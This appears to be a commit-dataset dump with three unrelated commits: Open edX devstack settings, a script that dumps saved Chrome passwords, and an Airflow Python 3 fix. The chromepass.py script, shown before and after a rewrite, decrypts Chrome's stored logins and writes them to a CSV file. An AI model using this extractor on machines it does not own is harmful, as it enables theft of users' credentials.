customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
Fix /media/ redirects on devstack
|
Fix /media/ redirects on devstack
|
Python
|
agpl-3.0
|
appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
Fix /media/ redirects on devstack
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
<commit_before>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
<commit_msg>Fix /media/ redirects on devstack<commit_after>
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
Fix /media/ redirects on devstack"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
<commit_before>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
<commit_msg>Fix /media/ redirects on devstack<commit_after>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
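The whitelist added in this record feeds a redirect middleware that is not shown in the diff, so the following is only an illustrative sketch of the usual prefix-check shape such a whitelist implies:

MAIN_SITE_REDIRECT_WHITELIST = ['/media/']

def should_redirect(path):
    # Leave whitelisted prefixes alone, e.g. uploaded media on devstack.
    return not any(path.startswith(p) for p in MAIN_SITE_REDIRECT_WHITELIST)

assert should_redirect('/dashboard')
assert not should_redirect('/media/logo.png')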
2ce08224bc87ae34f546211c80d2b89a38acd0ec
|
chromepass.py
|
chromepass.py
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
Complete Overhaul. Argparse used. Outputs to csv
|
Complete Overhaul. Argparse used. Outputs to csv
|
Python
|
mit
|
hassaanaliw/chromepass
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
Complete Overhaul. Argparse used. Outputs to csv
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
<commit_before>from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
<commit_msg>Complete Overhaul. Argparse used. Outputs to csv<commit_after>
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
Complete Overhaul. Argparse used. Outputs to csvfrom os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
<commit_before>from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
<commit_msg>Complete Overhaul. Argparse used. Outputs to csv<commit_after>from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
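Two caveats on this record's rewrite. First, hand-concatenated CSV rows break as soon as a URL or password contains a comma or quote; Python's csv module quotes correctly. Second, as of Chrome 80 saved passwords are AES-GCM encrypted with a key kept in the Local State file, so `CryptUnprotectData` on the password blob alone no longer suffices on current Chrome. A hedged Python 3 sketch of a safer writer, keeping the script's field names:

import csv

def write_csv(info, path='chromepass.csv'):
    with open(path, 'w', newline='') as fh:
        writer = csv.DictWriter(fh, fieldnames=['origin_url', 'username', 'password'])
        writer.writeheader()
        writer.writerows(info)  # quoting and escaping handled by the csv module

write_csv([{'origin_url': 'http://example.test', 'username': 'a,b', 'password': 'p"w'}])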
7a2e6723a925626b1d8ee6f70c656a9fd5befd5d
|
airflow/utils/__init__.py
|
airflow/utils/__init__.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
Fix airflow.utils deprecation warning code being Python 3 incompatible
|
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods
|
Python
|
apache-2.0
|
wooga/airflow,AllisonWang/incubator-airflow,sid88in/incubator-airflow,nathanielvarona/airflow,gritlogic/incubator-airflow,hgrif/incubator-airflow,gilt/incubator-airflow,sdiazb/airflow,andyxhadji/incubator-airflow,vijaysbhat/incubator-airflow,dmitry-r/incubator-airflow,mtagle/airflow,gritlogic/incubator-airflow,hamedhsn/incubator-airflow,mrares/incubator-airflow,NielsZeilemaker/incubator-airflow,brandsoulmates/incubator-airflow,easytaxibr/airflow,zoyahav/incubator-airflow,NielsZeilemaker/incubator-airflow,malmiron/incubator-airflow,asnir/airflow,gilt/incubator-airflow,sdiazb/airflow,hamedhsn/incubator-airflow,mtdewulf/incubator-airflow,dmitry-r/incubator-airflow,OpringaoDoTurno/airflow,biln/airflow,jesusfcr/airflow,Fokko/incubator-airflow,Acehaidrey/incubator-airflow,cjqian/incubator-airflow,yati-sagade/incubator-airflow,airbnb/airflow,dgies/incubator-airflow,owlabs/incubator-airflow,wndhydrnt/airflow,rishibarve/incubator-airflow,jesusfcr/airflow,DinoCow/airflow,ronfung/incubator-airflow,mylons/incubator-airflow,ledsusop/airflow,saguziel/incubator-airflow,apache/airflow,kerzhner/airflow,rishibarve/incubator-airflow,janczak10/incubator-airflow,mrares/incubator-airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,yati-sagade/incubator-airflow,r39132/airflow,r39132/airflow,jwi078/incubator-airflow,jlowin/airflow,mattuuh7/incubator-airflow,wndhydrnt/airflow,Fokko/incubator-airflow,CloverHealth/airflow,cjqian/incubator-airflow,btallman/incubator-airflow,lxneng/incubator-airflow,r39132/airflow,jesusfcr/airflow,malmiron/incubator-airflow,ty707/airflow,cfei18/incubator-airflow,mrkm4ntr/incubator-airflow,criccomini/airflow,MetrodataTeam/incubator-airflow,caseyching/incubator-airflow,gilt/incubator-airflow,apache/incubator-airflow,kerzhner/airflow,asnir/airflow,DinoCow/airflow,MetrodataTeam/incubator-airflow,cjqian/incubator-airflow,juvoinc/airflow,jbhsieh/incubator-airflow,spektom/incubator-airflow,kerzhner/airflow,cfei18/incubator-airflow,lxneng/incubator-airflow,saguziel/incubator-airflow,lyft/incubator-airflow,yk5/incubator-airflow,cademarkegard/airflow,mtdewulf/incubator-airflow,ledsusop/airflow,subodhchhabra/airflow,mattuuh7/incubator-airflow,r39132/airflow,KL-WLCR/incubator-airflow,wooga/airflow,DEVELByte/incubator-airflow,jlowin/airflow,easytaxibr/airflow,zack3241/incubator-airflow,wileeam/airflow,RealImpactAnalytics/airflow,jwi078/incubator-airflow,bolkedebruin/airflow,jesusfcr/airflow,stverhae/incubator-airflow,mrkm4ntr/incubator-airflow,cfei18/incubator-airflow,danielvdende/incubator-airflow,andyxhadji/incubator-airflow,owlabs/incubator-airflow,modsy/incubator-airflow,wooga/airflow,andrewmchen/incubator-airflow,ronfung/incubator-airflow,jiwang576/incubator-airflow,adrpar/incubator-airflow,modsy/incubator-airflow,d-lee/airflow,preete-dixit-ck/incubator-airflow,jgao54/airflow,gritlogic/incubator-airflow,dgies/incubator-airflow,vineet-rh/incubator-airflow,vijaysbhat/incubator-airflow,andrewmchen/incubator-airflow,fenglu-g/incubator-airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,yk5/incubator-airflow,adamhaney/airflow,stverhae/incubator-airflow,apache/airflow,jiwang576/incubator-airflow,fenglu-g/incubator-airflow,Twistbioscience/incubator-airflow,sergiohgz/incubator-airflow,artwr/airflow,N3da/incubator-airflow,airbnb/airflow,dud225/incubator-airflow,mtdewulf/incubator-airflow,CloverHealth/airflow,sid88in/incubator-airflow,ProstoMaxim/incubator-airflow,apache/incubator-airflow,Fokko/incubator-airflow,andrewmchen/incubator-airflow,preete-dixit-ck/incubator-airflow,janczak10/incubator-airflow,owlabs/incubator-airflow,wolfier/incubator-airflow,biln/airflow,danielvdende/incubator-airflow,wileeam/airflow,artwr/airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,hamedhsn/incubator-airflow,preete-dixit-ck/incubator-airflow,juvoinc/airflow,mtagle/airflow,wndhydrnt/airflow,ledsusop/airflow,skudriashev/incubator-airflow,dud225/incubator-airflow,rishibarve/incubator-airflow,forevernull/incubator-airflow,plypaul/airflow,dhuang/incubator-airflow,kerzhner/airflow,wxiang7/airflow,akosel/incubator-airflow,jiwang576/incubator-airflow,sekikn/incubator-airflow,wndhydrnt/airflow,Fokko/incubator-airflow,CloverHealth/airflow,cfei18/incubator-airflow,MetrodataTeam/incubator-airflow,Acehaidrey/incubator-airflow,MortalViews/incubator-airflow,DEVELByte/incubator-airflow,mistercrunch/airflow,jfantom/incubator-airflow,gtoonstra/airflow,criccomini/airflow,DEVELByte/incubator-airflow,subodhchhabra/airflow,zodiac/incubator-airflow,zoyahav/incubator-airflow,cfei18/incubator-airflow,jhsenjaliya/incubator-airflow,yati-sagade/incubator-airflow,subodhchhabra/airflow,jlowin/airflow,dhuang/incubator-airflow,dud225/incubator-airflow,wxiang7/airflow,jfantom/incubator-airflow,skudriashev/incubator-airflow,andyxhadji/incubator-airflow,danielvdende/incubator-airflow,wolfier/incubator-airflow,Fokko/incubator-airflow,CloverHealth/airflow,juvoinc/airflow,modsy/incubator-airflow,mtdewulf/incubator-airflow,btallman/incubator-airflow,d-lee/airflow,zack3241/incubator-airflow,jlowin/airflow,apache/airflow,alexvanboxel/airflow,jbhsieh/incubator-airflow,btallman/incubator-airflow,nathanielvarona/airflow,lyft/incubator-airflow,apache/airflow,mrares/incubator-airflow,hgrif/incubator-airflow,AllisonWang/incubator-airflow,sdiazb/airflow,mistercrunch/airflow,malmiron/incubator-airflow,stverhae/incubator-airflow,zack3241/incubator-airflow,jhsenjaliya/incubator-airflow,d-lee/airflow,yk5/incubator-airflow,vineet-rh/incubator-airflow,sekikn/incubator-airflow,Tagar/incubator-airflow,Tagar/incubator-airflow,easytaxibr/airflow,AllisonWang/incubator-airflow,airbnb/airflow,mtagle/airflow,gilt/incubator-airflow,hamedhsn/incubator-airflow,zoyahav/incubator-airflow,danielvdende/incubator-airflow,zodiac/incubator-airflow,edgarRd/incubator-airflow,sekikn/incubator-airflow,Tagar/incubator-airflow,andyxhadji/incubator-airflow,Twistbioscience/incubator-airflow,akosel/incubator-airflow,caseyching/incubator-airflow,airbnb/airflow,brandsoulmates/incubator-airflow,KL-WLCR/incubator-airflow,MortalViews/incubator-airflow,preete-dixit-ck/incubator-airflow,spektom/incubator-airflow,vineet-rh/incubator-airflow,yiqingj/airflow,wileeam/airflow,yati-sagade/incubator-airflow,mistercrunch/airflow,Acehaidrey/incubator-airflow,wolfier/incubator-airflow,plypaul/airflow,holygits/incubator-airflow,vijaysbhat/incubator-airflow,alexvanboxel/airflow,adrpar/incubator-airflow,RealImpactAnalytics/airflow,spektom/incubator-airflow,caseyching/incubator-airflow,adamhaney/airflow,wxiang7/airflow,DinoCow/airflow,adrpar/incubator-airflow,jgao54/airflow,wolfier/incubator-airflow,alexvanboxel/airflow,ronfung/incubator-airflow,dmitry-r/incubator-airflow,mrkm4ntr/incubator-airflow,nathanielvarona/airflow,OpringaoDoTurno/airflow,zack3241/incubator-airflow,skudriashev/incubator-airflow,biln/airflow,apache/airflow,plypaul/airflow,janczak10/incubator-airflow,mylons/incubator-airflow,DEVELByte/incubator-airflow,jfantom/incubator-airflow,janczak10/incubator-airf